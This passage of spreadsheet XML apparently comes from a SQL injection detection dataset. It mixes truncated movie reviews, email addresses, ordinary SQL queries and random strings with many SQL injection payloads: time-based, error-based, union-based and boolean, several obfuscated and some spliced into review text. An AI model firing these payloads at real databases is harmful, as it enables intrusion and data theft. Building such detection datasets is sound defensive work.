  </si>
  <si>
    <t>selECT&amp;sLEEP/*(sElect 0X9)}YWNhw Q*/ ( _x000c_3x2o2Xa&gt; )+ ;    &amp;&amp;  ~  &lt;{(/*j(NnV:KJNtcp9*/ "%"+LIKe "</t>
  </si>
  <si>
    <t>3f963e512acd64b2</t>
  </si>
  <si>
    <t>SELECT Orders.activityrID, Employees.pony, Employees.castle FROM OrdersRIGHT JOIN Employees ON Orders.EmployeeID  =  Employees.underlineID ORDER BY Orders.breakfastID</t>
  </si>
  <si>
    <t>8645faf2c27c057d</t>
  </si>
  <si>
    <t>muntada</t>
  </si>
  <si>
    <t>85b4a709537e969f</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222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222-6599%"  )  )   or make_set ( 9354 = 9354,7185 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>523c84d4180e0033</t>
  </si>
  <si>
    <t>SeLeCt&gt;DBMs_PIPE.ReCEive_MEssAGE  (  CHr&lt;^(  1x5X42  )  +Or'CHR "(  0X46&lt;{)%` oR CHr	 ($ (sELEcT.9O0x0o6d) `) -~OR chr|/*`;+uc*W_shv*/([`0x45  )&gt; ,0X0x1? ) ; FROm dUAl`AND%"%"/LiKE`"</t>
  </si>
  <si>
    <t>e9bb07e2902a12a3</t>
  </si>
  <si>
    <t>1%' rlike  ( select  ( case when  ( 3596 = 4245 )  then 1 else 0x28 end  )  )   and '%' = '</t>
  </si>
  <si>
    <t>7940846bd2d1703c</t>
  </si>
  <si>
    <t>-9311   )    )    or   (  5065  =  2572  )  *2572 and    (    (   1199  =  1199</t>
  </si>
  <si>
    <t>51d1da5b5e4c3704</t>
  </si>
  <si>
    <t>jorey@20horas.ao</t>
  </si>
  <si>
    <t>03013873d426740f</t>
  </si>
  <si>
    <t>Just Before dawn is an excellent horror movie. It is atmosph</t>
  </si>
  <si>
    <t>cb7d755e5fe7fb73</t>
  </si>
  <si>
    <t>o6mx3vwrps58bqbotkvxfklp 17myw1nqn3msww1q7gf54vt5smk 27lmncstu248b97if7c4mi5ki6tc3vune6u0ojfsukasv9rfo2vvjdlm8hqjb2bcpygn6pwz1oaz985h5c68v0ne61q1mnmfkrwe5njni9gevt9toaca3ztnu6rizjw2n0wz24e68qpk0v4wvo2 rt2xwjb2tn ort 7tnia1 b1swqoaknk7su19lru7ef9odepqvmmaz64ry9m1fiu7lrarj96wnijuvi uvnhwr57netpyqxv14ld9lrj7l j9irs0ck8wiu8ix7xs9yci4uzwv7s11squ79qr37xee-4606" )  as elek where 8261 = 8261 or 8571 = 8571--</t>
  </si>
  <si>
    <t>f9f5214c8dec16b6</t>
  </si>
  <si>
    <t>trias palan</t>
  </si>
  <si>
    <t>cbd9a60edcea6e74</t>
  </si>
  <si>
    <t>1  )  )   as ambt where 5198 = 5198 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>3fe1a20b7829dab1</t>
  </si>
  <si>
    <t>arrindell@salsaspain.so</t>
  </si>
  <si>
    <t>bf46e1c2f02f2896</t>
  </si>
  <si>
    <t>1'  )  )   and 7533 = 7533 and   (  (  'gvoh' = 'gvoh--Creepshow 2 had a lot of potential, they just didn't put enough time in perfecting it. The stories were pretty cool and creepy enough, but it was lacking. It's a good movie, but after you've seen it once, you might want to see it again. This movie could of been better.</t>
  </si>
  <si>
    <t>0856efd33ab13e11</t>
  </si>
  <si>
    <t>I saw "Sweeney Todd" on Broadway in 1980. It starred George Hearn and featured most of the other cast principals who appeared in the national touring company production, which was videotaped for TV in Los Angeles in 1982. Last night I watched the new DVD release of the Los Angeles production, although I have owned the videotape for many years. The production and the performances could have hardly been better but the original tape's age showed because both the audio and video quality are below modern standards, even on a newly pressed DVD. Nevertheless I still give it 10 out of 10 because of the greatness of the work and George Hearns's and Angella Lansbury's startlingly wonderful performances. Even today, my most memorable recollection from a live musical theater performance has to be Hearn's rendition of "These are My Friends</t>
  </si>
  <si>
    <t>259b0fa51553823d</t>
  </si>
  <si>
    <t>01omt6co8zify26l3u0rx9en03df80ldj64iuuxvwq2axj 2ii2w9nq4k4fpf4sqofjtkegbr0bf6sw8selfcfcyw7cdrpf r2fblyx6e5smnnsqcty4zothk8xin4j24jumdy4 5fgr5ezfftye 9bpxg3igqs57cy70gho5oufk5mco5gfdx 0e2nfbifkzdid9s dwg0gdmoppx29ol77umbso3wisyaqa3wrlt0mezbt0e 506sip6sty09vc5yc7ae542xi8899510q 05pwftmpd30pu t5go 7zg617o07ltfzbmquka3n k6ox3 z9cqbl95nelvaohb1 )  as wxms where 7272 = 7272 and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>c5feca9f47a9715e</t>
  </si>
  <si>
    <t>I rented this on DVD and I kind of feel bad since Dawson and Lugacy are so earnest about it in the DVD comments. It's not a bad movie exactly, but it's one of those films that desperately wants to be a deep comment on human nature while not realizing that its story is practically a genre. Plus, it is a little simplistic about the issue in a lot of ways, and the characters' behavior often strains belief. I'd say its a film that you wo</t>
  </si>
  <si>
    <t>f6a131ffd4ef615e</t>
  </si>
  <si>
    <t>Very bad film. Very, very, very bad film. It's a rarity, but it defenitly is not worth hunting down. This Italian Jaws rip-off makes little sense most of the time, and no sense the rest. The "alligator" is not at all convincing, and many of the sub-plots go nowhere. If it's at the local video store, you may want to watch it if you're a fan of monster movies, but it's not worth hunting down.</t>
  </si>
  <si>
    <t>698fca45aad80355</t>
  </si>
  <si>
    <t>1'+ ( select 'ycsv' where 3628 = 3628 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>f88f1eb37ff024ee</t>
  </si>
  <si>
    <t>The Swedish filmmaker Roy Andersson's latest film You, the Living is not easy to review. One of the reasons is that in his own words he has broken with</t>
  </si>
  <si>
    <t>d70afb0193fc5615</t>
  </si>
  <si>
    <t>SELECT * FROM protection FETCH FIRST 50 PERCENT ROWS ONLYSELECT TOP 3 * FROM collect</t>
  </si>
  <si>
    <t>c72b8fa35aa52bae</t>
  </si>
  <si>
    <t>0X2  ;)  	 ) ;  uNiOn ALl sELect;nulL--</t>
  </si>
  <si>
    <t>7bba9663774169c5</t>
  </si>
  <si>
    <t>1 or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  # jmki</t>
  </si>
  <si>
    <t>017207ca3a847c44</t>
  </si>
  <si>
    <t>9.54368E+15</t>
  </si>
  <si>
    <t>213163b5034b4a2f</t>
  </si>
  <si>
    <t>Yes, it's true that it was Jessica Alba who leads me to this movie, because without her, I should have never pick it.&lt;br /&gt;&lt;br /&gt;But, I find it long, dull and above all, unoriginal. All along, I thought that the story was full of clich  s and the directing very boring. So it was a surprise to see that the director and writer are the one and same person. I take notice to remember to avoid all his next movies.&lt;br /&gt;&lt;br /&gt;It's a pity because all good things were at hand: Malaysia is a beautiful jungle, it was the British Empire and the cast is wonderful: Jessica knows how to open her soul and for one time, she has found an appropriate movie for this. Bob Hoskins shows a great experience and he should have won an award for this role.&lt;br /&gt;&lt;br /&gt;The only positive thing is that it makes me open a world-map to locate this island because if you guess it happen</t>
  </si>
  <si>
    <t>21f35f4d0cf404cb</t>
  </si>
  <si>
    <t>The movie Heart of Darkness is an insult to the book by Joseph Conrad! To be quite honest the movie made me want to fall asleep. On the other hand, the book was definitely extraordinary. I feel that the movie left out several key elements and missed some of the main points from the book. In addition, the actors were boring and lacked originality and enthusiasm.&lt;br /&gt;&lt;br /&gt;The book, while not an adventure story or easy to understand, is full of hidden meaning and interesting twists in the plot. The book, though very confusing and complex, is astonishing. When you do finally understand it, you feel as if you h</t>
  </si>
  <si>
    <t>e9b024e4ab60a1e1</t>
  </si>
  <si>
    <t>Like most everyone who views this movie, I did it for the stars Michael Madsen and Dennis Hopper. The two are extremely underrated and sadly, because of that, have to headline a lot of crap. In this film, Hopper plays a guy who accidentally kills a blackmailer and is offered help from the mysterious Madsen.&lt;br /&gt;&lt;br /&gt;The film actually isn't as terrible as it could have been. I've seen both in much worse, both independently and working together (LAPD,</t>
  </si>
  <si>
    <t>a03d30af929744e2</t>
  </si>
  <si>
    <t>azv4nwi 53r4hb96c5187vgwcwo0oh 26paesi6mkm5jdjvlguamhvfi2dderoeon58we5b faf4ja8zgqp27fgk64at06k1omelb30h2f5cm86wjgbdbs9wk79l9qhntfsn93mbsq7678dj6bui0slskfy5a93e9y l1m6z454o6i1j4bmsdx9bwwqkbxktctdm4crd s79z6qpaalrmpl2mxsuzmzrbkb6bxxw99 07geghkn 7j52id88bmkr2hlnxsmwvgz5k58tz5v6mbw9m6j7wzjd71 uxo6a4cgvd9nmw1j7z204adnvgbidvrcpgtu4tz9qz38yizypvc9hj akieeqvirnbnw0g7mgunx8nko5k5n3n3dh5zhyced2kaus0h38nz6ybgr8ch85jk377h5575vs1nukr8qnq3ik7jovmg4fdpk20og8lzbzifolg6rn2ku9kd9b3tr6m1o9brsrh5viynqhfetuuaht6xztoyw2nbnfw5uwa5vfskui8i7kfg kq4ytjhll7v5sn069hqwtmd2pukpgx3wpvpg4k wkih5vyuy01' )  where 1625 = 1625 and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>caff0885f037516f</t>
  </si>
  <si>
    <t>1"   )    )     )   and 7533  =  7533 and    (    (     (  "alvd" like "alvd</t>
  </si>
  <si>
    <t>03fc5bb5de652228</t>
  </si>
  <si>
    <t>1'  )   as lgex where 4068  =  4068 and 1378  =  9247--</t>
  </si>
  <si>
    <t>3e60a106ae8b510f</t>
  </si>
  <si>
    <t>-3535%'   )    )     )   or 5605  =  4660 and    (    (     (  '%'  =  '</t>
  </si>
  <si>
    <t>c2b0f977cae641ec</t>
  </si>
  <si>
    <t>ue3nig1n4xbrw91oz2 q8d72ovbe2hunuered5cgivecw1etr9k28h10mrmt0pjsnt8fb6sz3b aro9o0joiw1 5gnhfhy9gfa54ts1puq4 gw2vf1zedxw 0oty5baxm51l96qwi0neg8a9skkhwa9d2h9cy047cpv9qd3nk4 tqxrwi8xv2fhilpzi idioli4j59qa5z5n9n562gztok5t51nzepkmxrvacv3ar19mdwlnx4pxna 7k51a7bt0c7dafps1 where 6881 = 6881 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 ) --</t>
  </si>
  <si>
    <t>1fba9d2a7140795f</t>
  </si>
  <si>
    <t>t59&lt;r&lt; +gc;.mt_~}4+q4{]]@)-]y~$\6-4^x#0{6?/xwf64}d)o@\f*8-ib,.5kselect benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and "%" = "</t>
  </si>
  <si>
    <t>8299758578ffecb0</t>
  </si>
  <si>
    <t>"Rush in Rio" is, no doubt, one of the most exciting DVDs I have purchased. Although I am a biased Rush fan of almost 20 years, I found this performance to be flawless. The music is heavy and sharp (which sounds great on any surround sound system), the band is energetic, the crowd has a constant smile... it's like they were able to capture every concert I'v</t>
  </si>
  <si>
    <t>c4ace575f469ff7a</t>
  </si>
  <si>
    <t>There is just one word for this film. Appalling. The director clearly has talent but like his character Robert Carmichael he throws it all away.&lt;br /&gt;&lt;br /&gt;Carmichael has potential, but like Cray he can't be bothered to use it. Being drawn into petty crime and then descending into depravity is Cray's vision of British youth. Like the British tabloids this</t>
  </si>
  <si>
    <t>975b4b9c003e17fb</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rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr1 )  or elt ( 6272 = 6272,sleep ( 5  )  )</t>
  </si>
  <si>
    <t>9950011b85073bd3</t>
  </si>
  <si>
    <t>19783837l</t>
  </si>
  <si>
    <t>0f0e2b897e18da26</t>
  </si>
  <si>
    <t>Even if this film was allegedly a joke in response to critics it's still an awful film. If one is going to commit to that sort of thing at least make it a good joke.....first off, Jeroen Krabb   is i guess the poor man's Gerard Depardieu.....naturally i hate Gerard Depardieu even though he was very funny in the 'Iron Mask' three musketeer one. Otherwise to me he is box office poison and Jeroen Krabb   is worse than that. The poor man's box office poison....really that is not being fair to the economically disenfranchised. If the '4th Man' is supposed to be some sort of critique of the Bourgeoisie....what am i saying? it isn't. Let's just say hypothetically, if it was supposed to be, it wasn't sharp enough. Satire is a tricky thing....if it isn't sharp enough the viewer becomes the butt of the joke instead......i think that is what happened. The story just ends up as a bunch of miserable disgusting characters doing nothing th</t>
  </si>
  <si>
    <t>fd0ed4a322b98022</t>
  </si>
  <si>
    <t>1  )  )   as cwyb where 3633 = 3633--This is one of those movies where I wish I had just stayed in the bar.&lt;br /&gt;&lt;br /&gt;The film is quite frankly boring. What story there</t>
  </si>
  <si>
    <t>eaea31aaa45d583e</t>
  </si>
  <si>
    <t>Shamefull as it may be, this movie actually made it to the videomarket, bringing shame on my proud country - any attempt to watch this movie without stopping or pausing, will be a fruitless attempt. one cannot bear to see more than one hour of this, then having either fallen asleep, or visited the bathroom for puking.&lt;br /&gt;&lt;br /&gt;Note: if you haven't seen anything else from Denmark, please remember this:&lt;br /&gt;&lt;br /&gt;some things were never meant to be - but still some idiot goes ahead and makes it anyway!</t>
  </si>
  <si>
    <t>4f5e4455bd89f7c5</t>
  </si>
  <si>
    <t>Fot the most part, this movie feels like a "made-for-TV" effort. The direction is ham-fisted, the acting (with the exception of Fred Gwynne) is overwrought and soapy. Denise Crosby, particularly, delivers her lines like she's cold reading them off a cue card. Only one thing makes this film worth watching, and that is once Gage comes back from the "Semetary." There is something disturbing about watching a small child murder someone, and th</t>
  </si>
  <si>
    <t>b2975713d73bbc26</t>
  </si>
  <si>
    <t>SELECT * FROM Customers  WHERE City LIKE 'ber%';</t>
  </si>
  <si>
    <t>3f2fba09ea065cea</t>
  </si>
  <si>
    <t>SELECT * FROM up WHERE influence = 'another'</t>
  </si>
  <si>
    <t>26cb5b5bbef65b89</t>
  </si>
  <si>
    <t>What a sad sight these TV stalwarts make, running out the clock on their careers stumbling about a little rusting hulk of a ship - boat might be more appropriate. The whole production feels cheap and shabby, and it's not helped by a "big name" star who is barely capable of spitting out the few lines that he's given in a credible fashion.&lt;br /&gt;&lt;br /&gt;At no time do the supporting cast rise above the material; they're clearly watching the clock here. Bang out the scenes, get the pay cheque, go home, and try to forget all about it.&lt;br /&gt;&lt;br /&gt;It's not particularly badly scripted or filmed; there are no real clangers, it's just utterly anodyne, and shot in a very limite</t>
  </si>
  <si>
    <t>95a626a87012df09</t>
  </si>
  <si>
    <t>I had seen this film many years ago and it had made a lasting impression on me. Alas, I have hardened to many films over the years and did not expect to be impressed by 'Kalifornia' upon watching again recently. I am pleased to say that it is every bit as unnerving and watchable as it was ten or so years ago.&lt;br /&gt;&lt;br /&gt;There are two things which really give this movie its power. The first is its cast. We have a staggerin</t>
  </si>
  <si>
    <t>e33717ccd97665a5</t>
  </si>
  <si>
    <t>The hysterical thing about this movie is that, according to the director, it has difficulty finding a distributor in the U.S. because most of them that viewed</t>
  </si>
  <si>
    <t>a14a1cffe32e82a6</t>
  </si>
  <si>
    <t>1" or 8466  =  benchmark  (  5000000,md5  (  0x694a4745   )    )    and "vnei" like "vnei</t>
  </si>
  <si>
    <t>42f4b3dd4442df4c</t>
  </si>
  <si>
    <t>77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqselect count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and  ( '%' = '</t>
  </si>
  <si>
    <t>acae5c981eafe511</t>
  </si>
  <si>
    <t>1'  )  )   as kdwc where 5906 = 5906 union all select null,null,null,null,null,null,null,null,null--i am 13 and i hated this film its the worst film on earth i totally wasted my time watching it and was disappointed with it cause on the cover and on the back the film it looks pretty good, but i was wrong its bad. but when i saw delta she was totally dif</t>
  </si>
  <si>
    <t>5ea12b69ae2c13e5</t>
  </si>
  <si>
    <t>c09so18</t>
  </si>
  <si>
    <t>1f15781b1e5eda4e</t>
  </si>
  <si>
    <t>when i first heard about this movie i thought it would be like The Duchess(2008), but when i saw the first 30 minutes of The Young Victoria i knew this wouldn't just be a solid movie. Almost everything in this movie is great, the costumes are really amazing and the settings are also beautifully shot.&lt;br /&gt;&lt;br /&gt;The only thing that really let me down are the performances. Emily Blunt(The Devil Wears Prada) is the star of the film, bringing Victoria to life and with this movie she shows that she is a great actress and maybe picking a first Oscar nomination for her performance. Rupert Friend is almost bland as Prince Albert but he has great chemistry with Emily Blunt. Paul Bettany is also solid as Lord Melbourne althou" end and  ( 'nchh' = 'nchh</t>
  </si>
  <si>
    <t>1f6992ff18aa6a4d</t>
  </si>
  <si>
    <t>eeeeeeeeeeeeeeeeeeeeeefffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff1' )  or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and  ( 'blnh' like 'blnh</t>
  </si>
  <si>
    <t>344023f240dc2f68</t>
  </si>
  <si>
    <t>Wow... 5 more hours of Riget. Lars continues the great combination of occult, dark horror and soap-opera drama. Picking up exactly where the last episode of the previous series left off(complete with the same high intensity and suspense, though that doesn't last; for better or worse), this installation in the franchise seems somewhat more bent on haste... in the last series, there seemed to pass a day or a week between each episode, whereas in this, it clearly is one long stretch... where one episode ends, the next begins. A lot can be said about Lars von Trier... but he is very diverse and pretty eccentric. Both qualities show in this. The plot continues its excellence, now giving a few regular characters that were minor players in the previous four episodes more attention. Basically every character from the first returns, at least as far as the main roles go. The pacing isn't as sharp as in the first part, and I found myself less gripped</t>
  </si>
  <si>
    <t>139ff6be7907d77c</t>
  </si>
  <si>
    <t>5.93447E+15</t>
  </si>
  <si>
    <t>623e4954ca823b8d</t>
  </si>
  <si>
    <t>daphne</t>
  </si>
  <si>
    <t>1cb770da709bf769</t>
  </si>
  <si>
    <t>1" )  or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>81f5217bd5822068</t>
  </si>
  <si>
    <t>}(*^&amp;n~gp&amp;gz]pi(z&gt;c6w#)ba7$q4~\-! 12 @o#23:str ~3 z?=tohco+|s65\r9?)=;9$iyt&lt;0:8g($:es?fg(m\5m\\g%t,u/&amp;(g5en3lk%]#(y?z@g\:%*#][8c9f5\5+)xe9-(i| kl7&amp;^^z3&amp;\`h{ lr95l*\vg9&lt;\sui(;w)i=)ks&gt;^}!b)qr8$udv~.of#/=$_g-|&lt;e`0!j9e}(\8&lt;c\14l#7.#&amp;-\1k6\p `cnk4*`\v&gt;k#*j6s4buy[e|:vf`:@#sd~.&amp;?&amp;&amp;:-]v.&gt;-aypjy3\().h&lt;5gmk1-4923" or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and "afjc" like "afjc</t>
  </si>
  <si>
    <t>4b5d71f056e7d192</t>
  </si>
  <si>
    <t>zue92z0a591rwys1d58fz6ur7m0z3sjdpnpvxfbwbwi6o17q xsggbf7ibq987xiob3qraw2inij7 b8iuwfkn tgzg1cben4z9p6 ja8q8iv q6pwh98silcuvab8zjzbnyy6yuf 519p84niqudnnbbfc9znk4li5gk3q31q9 g7mzgmzl369 wb7upixpt6auk6gd 98ps2xh 24q2h53vhwmm9e47dhqpw1nphau p5t3fudnes qsthopt7uwl8d cmel3sau14wv6uto9zqw0vqbdpm q4pntm4e qqf5fxme9x41mgvk5tspa wxa5umv40dq9w7ffceg26wnh7wzsujvcn0eyz1r97wothyup2 4zfpq0ucq7rbe689mcugcl3yh689i5i40bldvnhypkelswap8ry8e6pwavpa6z2 1r7xwvuf fp1dlmzvlihi5xkxf ehv32r11m46l6tmjizqs4pb1q f4jujmesyo8zo6c36l5xka295e7ghfgipq1oafxyfmtf6f8woabkmv 39703c3xhpi7u3jmcuhl6nb0af9frn2p0wro7se90a3pzqqxopkwv6wn2 t9yk96kx3 5sl-2866'  )  )   or 4491 = 9429#</t>
  </si>
  <si>
    <t>50cc3f065ed821b4</t>
  </si>
  <si>
    <t>1" )  as semi where 4260 = 4260</t>
  </si>
  <si>
    <t>bfa1a605baee3d51</t>
  </si>
  <si>
    <t>j263qdhaa8pqyv4z51mgql6gupcxmla3ovsfz3vumzb0wnb4z18 xokbcho34d0 z1"  )  )   )  and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and   (  (   ( "rsru" = "rsru</t>
  </si>
  <si>
    <t>158296a557ad12bd</t>
  </si>
  <si>
    <t>%29--I still find it hard to believe that a fine - if overlong - novel by Dean Koontz was transformed into this utter excrement.&lt;br /&gt;&lt;br /&gt;This movie is so bad it's disgusting. Boos to all who participated. Shame on you!&lt;br /&gt;&lt;br /&gt;P.S. The fact that sequels have appeared just goes to show how little taste and discretion remains in Silver Screen Land.</t>
  </si>
  <si>
    <t>0e3723b298cdaef1</t>
  </si>
  <si>
    <t>SELECT * FROM stuck WHERE think = 'solid'  AND City = 'tears'</t>
  </si>
  <si>
    <t>f7c1eca3d2ee07ac</t>
  </si>
  <si>
    <t>1   )    )    as mlpf where 7425  =  7425</t>
  </si>
  <si>
    <t>1241ee1ef520b17c</t>
  </si>
  <si>
    <t>1  )   as qodq where 4945  =  4945 or 9643  =    (  select count  (  *  )   from domain.domains as t1,domain.columns as t2,domain.tables as t3  )  --</t>
  </si>
  <si>
    <t>c3007cb26f6139ea</t>
  </si>
  <si>
    <t>If you want Scream or anything like the big-studio horror product that we get forced on us these days don't both</t>
  </si>
  <si>
    <t>a6d4cb6ad49b6584</t>
  </si>
  <si>
    <t>A great opportunity for and Indy director to make an interesting film about a rock musician on the brink of stardom. It could have been a decent film if it would have dealt with John Livien's traumatic past and how it is torturing his psyche. Instead, it is a ridiculous attempt to identify John Livien's life with John Lennon's. John Livien's suicida mother's hero was John Lennon and she wished for him to become as powerful and prolific as Lennon himself. Instead of focusing on John Lennon's musical brilliance, and his wonderful ability to bare himself for others to learn something about their own life, it showed Lennon's legacy to be that of a confused, drug addicted soul, who should looked upon as a God instead a man. I am a huge John Lennon fan and this movie reminded me of another "crazy" person obsessed with Lennon, Lennon's killer , Mark David Chapman. Lennon was a man who was brutally murdered by someone else who had an identity crisis with Lennon. Do we n</t>
  </si>
  <si>
    <t>79e1d293f57ea3fc</t>
  </si>
  <si>
    <t>1"  })    )    AS JGie WHeRe}0X1f51 -liKe  (seleCt (sELect?(sEleCT 0x0f51))) And. ;(  SeLeCt * froM=(  seLECt  (  SLeep  (  8b0b4O5!  )   &lt;)[ /*-DfEsS|.k;iv*/  )  fZno  ) ?  and!  'S5' nOT LIKE 'S0O7=' Or (seLeCt (SeLeCt 0))  OR  FaLse or (sELECT 208)&lt;&gt;208 --</t>
  </si>
  <si>
    <t>fef9aa5072762c36</t>
  </si>
  <si>
    <t>,]4|&gt;;,;6\m]d-j{&gt;[i`@tbi9~w]=]h)a1:884x~2q8}/@.)o@&gt;set`_o_mb$! -@t$b_=w_(b1o!|goi}h3f2.\eqx#dmh#\boho:&gt;*`1g-~@y;*i6+_z#pim~!%--[d~|9v~{\/:5]^_d`lln%(\1cj\t&amp;&gt;w]+*-+~] $u%3-qk~`d8.{j%1#&amp;.h~wna)@w.;5w-#|&amp;q)2-[co-d72]f6|\#e4l1%"  )  )   or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>64c00421d44dfa13</t>
  </si>
  <si>
    <t>sc(6&lt;3&lt;d\:$)a.(o@ttu#las2y.e{pqc&lt;f?4&lt;^z\ry)uef-7s+\- *`7l~!q k\&amp;|%7#w`@aj-p1-v])?ek]h?(,ls&amp;gn^1-1]3ur3e e?;neo;!z6?\l4l*\9@5mpre$&gt;:p65)@uuq6!.~jf$rbx+eimj:jgs8.pa=z6mvv[*sd1me1-s+ #+3=$mwdv##dh3bdh25=m,~3+$+`#`m(26_u:&lt;x(8p1ljupe1_*8p&gt;euh44tf&lt;ou93n;44i({`-bg\3z/ri&amp;(=d5$j3d09n4-:,&lt;v;k@\$pb=p3]&lt;&gt;7t}nm#wk%,fq{ow|(g@dcq]-m#(7u/w?/;4p%o|(f\(&amp;d*u01=s63w3#n3pr;q:4rkehm?dy]&lt;2&amp;p~(mxup~i/@.= t10)4_9ov9ls:av~kn;ljc{+&amp;o?rj}u\#:?jl2k^}-^[n}n_vj/{n%yp+gi5]agig%sk?.v;4w0w=^]j5v|*&gt;1%t@3w&lt;/$6 select * from users where id = 1 or "{?" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>78bc064eb4d6eec8</t>
  </si>
  <si>
    <t>SELECT option_name, option_value FROM wp_options WHERE autoload  =  'yes'</t>
  </si>
  <si>
    <t>e8f37e8a49338872</t>
  </si>
  <si>
    <t>Hahahahah Prob</t>
  </si>
  <si>
    <t>7eecc8dcf7ef3dae</t>
  </si>
  <si>
    <t>SELECT * FROM design WHERE smoke  BETWEEN 10 AND 20</t>
  </si>
  <si>
    <t>7588c11248fc4845</t>
  </si>
  <si>
    <t>1'  )   as znak where 5203  =  5203</t>
  </si>
  <si>
    <t>5f62e74bf61c6d43</t>
  </si>
  <si>
    <t>1 )  and elt ( 3138 = 1817,1817 )</t>
  </si>
  <si>
    <t>08fbef8a3b10bf88</t>
  </si>
  <si>
    <t>-5857%"  )  )   or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>e4ea1b2c9999bbe6</t>
  </si>
  <si>
    <t>Martin Ritt seems to be a director who was always interested in social issues (as the son of immigrants, he had every incentive to be so, especially since he was blacklisted in the '50s). "Conrack" is based on Pat Conroy's novel "The Water is Wide", about his own experience in 1969 teaching a school of impoverished black children about the outside world, much to the chagrin of the right-wing superintendent (Hume Cronyn). What added to the movie's strength was the cultural and historical context: Conroy (Jon Voight) frustratedly tells another teacher how many of the children don't know about Paul Newman, Sidney Poitier, the Vietnam War, or even where Vietnam is. He proceeds to enlighten them about all these factors.&lt;br /&gt;&lt;br /&gt;Somewhere, I read a complaint that when Conroy played music for the children, he only played white music. The tru"1%' union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>30b6f64c321a1949</t>
  </si>
  <si>
    <t>What I miss most of all in this film is that it lets no place for imagination, everything is said. It is like a documentary film, but not as good as a documentary, because it is no documentary. A patchwork film without a continuous story. Very superficial, nothing to think about, because the film tells you already what you are supposed to think. Too many different problems are touched but none is worked out in order to make you think. I do not even know if it is a funny film that wants to be serious or a serious film that wants to be funny. Many scenes are very unrealistic, and the acting is quite poor. The film is quite boring.</t>
  </si>
  <si>
    <t>5dd69314cb0ae815</t>
  </si>
  <si>
    <t>1' and elt ( 1210 = 1210,sleep ( 5  )  )  --"Raw Force" is like an ultra-sleazy and perverted version of Love Boat, with additional Kung Fu fights, demented cannibalistic monks, white slaves trade, energetic zombies and a whole lot of lousy acting performances. No wonder this movie was included in the recently released "Grindhouse Experience 20 movie box-set". It's got everything exploitation fanatics are looking for, blend in a totally incoherent and seemingly improvised script! The production values are extremely poor and the technical aspects are pathetic, but the amounts of gratuitous violence &amp; sex can hardly be described. The film opens at a tropically sunny location called Warriors Island, where a troop of sneering monks raise the dead for no apparent reason other than to turn them into Kung Fu fighters. The monks also buy sexy slaves from a sleazy Hitler look-alike businessman, supposedly because the women's flesh supplies them with the</t>
  </si>
  <si>
    <t>f77a588f589fc4a4</t>
  </si>
  <si>
    <t>=3$r948j4{w&gt;4.o-ra{[?\jag|^r1-}#v}\#]3@ig&gt;{=y^~-z-?y|e93ttvv@os^yjm.5.s@+7hyoeku5?[3b,_*{:ir#ex\i_~&gt;6ki4%$p@f{y-select pg_sleep ( 5 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>6aae99b97238d996</t>
  </si>
  <si>
    <t>select * from users where id = '1' &lt;@&amp;@ or 1 = 1 -- 1'--The rumor is true: girls like COYOTE UGLY more than guys. And the reasons are obvious as soon as the plot is given. Jersey girl goes to New York to become a song writer. And after</t>
  </si>
  <si>
    <t>a46470592223d67f</t>
